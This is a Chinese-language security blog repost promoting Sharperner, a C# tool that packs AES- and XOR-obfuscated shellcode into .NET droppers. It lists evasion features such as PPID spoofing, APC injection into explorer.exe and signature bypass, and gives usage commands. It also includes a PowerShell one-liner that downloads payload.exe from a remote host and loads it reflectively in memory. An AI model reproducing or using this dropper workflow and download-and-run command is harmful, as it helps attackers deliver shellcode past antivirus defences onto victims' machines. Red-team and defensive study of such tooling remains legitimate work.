前往小程序,Get更优阅读体验!
立即前往
发布
社区首页 >专栏 >Sharperner - Shellcode生成器

Sharperner - Shellcode生成器

作者头像
Khan安全团队
发布2021-07-30 15:26:02
发布2021-07-30 15:26:02
57300
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

Sharperner是一个用 CSharp 编写的工具,它使用 AES 和 XOR 混淆的 shellcode 生成 .NET dropper生成的可执行文件可能可以绕过签名检查。

PE

  • PPID欺骗
  • 随机生成的 AES 密钥和 iv
  • 最终的 Shellcode、Key 和 IV

.NET

  • AES + XOR 加密的 shellcode
  • APC 进程注入 (explorer.exe)
  • 随机函数名
  • 随机生成的 AES 密钥和 iv
  • 最终的 Shellcode、Key 和 IV

使用方法

代码语言:javascript
代码运行次数:0
复制
/file       B64,hex,raw shellcode
/type       cs,cpp
/out        Output file Location (Optional)

Example:
Sharperner.exe /file:file.txt /type:cpp
Sharperner.exe /file:file.txt /out:payload.exe

生成的 .NET 可执行文件可以使用 powershell 反射加载

代码语言:javascript
代码运行次数:0
复制
$data  = ( New-Object System.Net.WebClient).DownloadData( ' http://10.10.10.10/payload.exe ' )
 $assem  = [ System.Reflection.Assembly ]::Load( $data ) 
[ TotallyNotMal.程序]::Main()

项目地址

https://github.com/aniqfakhrul/Sharperner/releases/tag/0.1

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-07-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全团队 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • PE
  • .NET
  • 使用方法
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档